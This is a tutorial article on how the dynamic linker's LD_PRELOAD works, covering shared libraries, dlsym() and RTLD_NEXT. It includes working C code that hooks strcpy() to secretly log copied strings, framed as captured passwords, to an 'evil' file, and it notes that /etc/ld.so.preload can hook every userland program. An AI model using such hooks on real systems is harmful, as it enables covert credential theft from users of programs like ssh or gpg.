LD Preload
Special thanks to ErrorProne for his contributions to this article.
Introduction
LD_PRELOAD is, in the simplest terms, a way to "preload" a shared library. It is an option read by the dynamic linker (ld.so), set through either a config file or an environment variable. The preloaded library is loaded before all others, so the symbols it defines override those of any library loaded after it:
LD_PRELOAD=./yourso.so some_command
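The value must contain a slash to be treated as a path (relative, as above, or absolute). A bare file name is not looked up in the current directory, so you cannot do:
LD_PRELOAD=yourso.so
unless the library is already in the dynamic linker's search path.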
LD_PRELOAD acts at the runtime (dynamic) linking stage. Compilers such as gcc and g++ can link a binary against a shared object so that its external symbols are resolved when the program is loaded rather than when it is built. As an example, printf() is part of libc (glibc on most Linux systems). libc.so.#.#.# contains the printf() function along with an export table that records the address of printf().
Shared libraries are libraries shared between multiple executables. They are linked dynamically at runtime instead of statically during compilation. A shared library lets multiple programs use a single copy of a function's code instead of each loading its own instance into memory. This is done primarily for system performance, as redundant copies of a function would unnecessarily consume system resources. LD_PRELOAD allows you to tell the runtime linker to load the specified shared library first, giving it precedence over every other library.
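As a minimal sketch of that precedence, assuming a glibc-based Linux system, the hypothetical library below defines its own rand(). The file name fixedrand.c and the value 42 are illustrative choices, not part of any real tool.

```c
/* fixedrand.c: hypothetical preload library (name chosen for illustration). */
#include <stdlib.h>

/* Same signature as libc's rand(). When this object is preloaded, the
 * dynamic linker finds this definition before libc's, so callers get 42. */
int rand(void)
{
    return 42;
}
```

Built with gcc -shared -fPIC -o fixedrand.so fixedrand.c and run as LD_PRELOAD=./fixedrand.so some_command, any dynamically resolved call to rand() in some_command should return 42.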
LD_PRELOAD use is generally innocuous; tsocks and checkinstall use it, among many other programs. However, it can easily be abused. There is a config file, usually /etc/ld.so.preload, that lists the paths of shared libraries to preload globally. As a result, the entire userland, save statically compiled applications (rare), will use your overridden functions. A function's address is a pointer-sized value (a DWORD on 32-bit systems, a QWORD on 64-bit systems) and can be looked up in the export table using the function dlsym().
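The lookup can be sketched as follows, assuming glibc, where RTLD_DEFAULT is only declared when _GNU_SOURCE is defined. The helper names lookup_symbol and show_symbol are hypothetical.

```c
#define _GNU_SOURCE            /* exposes RTLD_DEFAULT in glibc's <dlfcn.h> */
#include <dlfcn.h>
#include <stdio.h>

/* Return the address the dynamic linker resolves `name` to,
 * or NULL if no loaded object exports that symbol. */
void *lookup_symbol(const char *name)
{
    return dlsym(RTLD_DEFAULT, name);
}

/* Print the resolved address together with the pointer width in bytes
 * (4 on a 32-bit build, 8 on a 64-bit build). */
void show_symbol(const char *name)
{
    printf("%s -> %p (%zu-byte pointer)\n",
           name, lookup_symbol(name), sizeof(void *));
}
```

Calling show_symbol("printf") from a dynamically linked program prints the address printf() was loaded at. On glibc releases older than 2.34 the program has to be linked with -ldl.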
Other nasty things can be done, such as hooking ssh, gpg, or any other program into which a user enters sensitive information. It is possible to hook functions such as strcpy() and dump their arguments to files for retrieval at a later date. It's just a matter of cracking open the target application and finding which calls are made on the sensitive data.
Simple Practical Example
Suppose an application asks for a user's password, hashes it, and then compares it to a stored value.
Let's say it calls:
strcpy(password, user_input);
Grab the definition of strcpy():
char *strcpy(char *s1, const char *s2);
To hook the function, open up the man page and copy the function definition, then add code to write the second argument to a file. So the preloaded library now contains the following:
char *strcpy(char *s1, const char *s2)
{
    FILE *fp = fopen(your_evil_filepath, "a");  /* open the log file for appending */
    fprintf(fp, "%s\n", s2);                    /* record the source string */
    fclose(fp);
}
Now, there is an obvious problem with this: strcpy() no longer copies anything, and everything that uses it will break. To fix this, either call the original, working version of strcpy() or implement a new, working strcpy(), since it is a simple, primitive function. The former is preferable in most cases, as it usually requires less code than rewriting the entire function. Unfortunately, calling strcpy() by name from within the preloaded library will not work, because the name now resolves to the hook itself. To call the original function, a function pointer that points to the original function must be declared. Fortunately, this is simple to do.
For strcpy, the function pointer prototype is:
char *(*old_strcpy)(char *dest, const char *src);
Notice that because this is a function pointer there are two asterisks. The first belongs to the return type (pointer to char) of the original function, while the one inside the parentheses marks the declaration as a function pointer. Also notice that the rest of the declaration matches strcpy's prototype. The function pointer must now be made to point to the original function. To do this, use dlsym(), a function provided by the dynamic linking library (libdl), which is defined as:
void *dlsym(void *handle, const char *symbol);
The handle identifies the library containing the original function and is normally the value returned by dlopen(); the symbol is the name of the function. There are two special pseudo-handles, RTLD_DEFAULT and RTLD_NEXT. The former will find the first occurrence of the desired symbol using the default library search order. The latter will find the next occurrence of a function in the search order after the current library. This allows one to provide a wrapper around a function in another shared library. On glibc, both pseudo-handles are only declared when _GNU_SOURCE is defined before <dlfcn.h> is included.
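A short sketch of resolving a symbol with RTLD_NEXT and calling it through a function pointer, assuming glibc. The typedef strcpy_fn and both helper names are hypothetical.

```c
#define _GNU_SOURCE            /* exposes RTLD_NEXT in glibc's <dlfcn.h> */
#include <dlfcn.h>
#include <stddef.h>

/* Pointer type matching strcpy's prototype. */
typedef char *(*strcpy_fn)(char *dest, const char *src);

/* Ask the dynamic linker for the next definition of strcpy after the
 * object this code lives in. POSIX requires that the void * returned by
 * dlsym() can be converted to a function pointer. */
strcpy_fn resolve_next_strcpy(void)
{
    return (strcpy_fn)dlsym(RTLD_NEXT, "strcpy");
}

/* Copy src to dest through the resolved pointer; returns NULL if the
 * lookup failed. The pointer is resolved once and cached. */
char *copy_with_original(char *dest, const char *src)
{
    static strcpy_fn original;

    if (original == NULL)
        original = resolve_next_strcpy();
    return original != NULL ? original(dest, src) : NULL;
}
```

With RTLD_DEFAULT in place of RTLD_NEXT, a library that itself defines strcpy() and is first in the search order would get its own definition back, which is why wrappers use RTLD_NEXT.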
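So, to obtain a pointer to the original strcpy that remains usable after strcpy is overridden, resolve it inside the hook (C does not allow the dlsym() call at file scope):
#define _GNU_SOURCE                                  /* must precede the includes */
#include <dlfcn.h>
#include <stdio.h>

static char *(*old_strcpy)(char *dest, const char *src);

char *strcpy(char *s1, const char *s2)
{
    if (!old_strcpy)
        old_strcpy = dlsym(RTLD_NEXT, "strcpy");     /* resolved on first call */
    FILE *fp = fopen(your_evil_filepath, "a");
    if (fp) {                                        /* skip logging if the open fails */
        fprintf(fp, "%s\n", s2);
        fclose(fp);
    }
    return old_strcpy(s1, s2);                       /* hand off to the real strcpy */
}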
The hooked strcpy() now records its second argument and otherwise appears to behave normally.
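One caveat is worth sketching. If fopen() or fprintf() reach strcpy() through the dynamic linker, the hook would call itself; whether that happens depends on the C library. The variant below is a defensive sketch that assumes glibc and a C11 compiler. The HOOK_LOG environment variable, the log_argument helper and the strcpy_fn typedef are hypothetical names introduced for illustration.

```c
#define _GNU_SOURCE            /* exposes RTLD_NEXT in glibc's <dlfcn.h> */
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>

typedef char *(*strcpy_fn)(char *dest, const char *src);

static strcpy_fn old_strcpy;          /* original strcpy, resolved lazily */
static _Thread_local int in_hook;     /* per-thread re-entrancy flag */

/* Append one line to the file named by HOOK_LOG (hypothetical variable);
 * silently does nothing if the variable is unset or the open fails. */
static void log_argument(const char *s)
{
    const char *path = getenv("HOOK_LOG");
    FILE *fp = path != NULL ? fopen(path, "a") : NULL;

    if (fp != NULL) {
        fprintf(fp, "%s\n", s);
        fclose(fp);
    }
}

char *strcpy(char *s1, const char *s2)
{
    if (old_strcpy == NULL)
        old_strcpy = (strcpy_fn)dlsym(RTLD_NEXT, "strcpy");
    if (old_strcpy == NULL)
        abort();                      /* no original to forward to */

    if (!in_hook) {                   /* skip logging for nested calls */
        in_hook = 1;
        log_argument(s2);
        in_hook = 0;
    }
    return old_strcpy(s1, s2);
}
```

The flag is thread-local so that a nested call on one thread does not suppress logging on another.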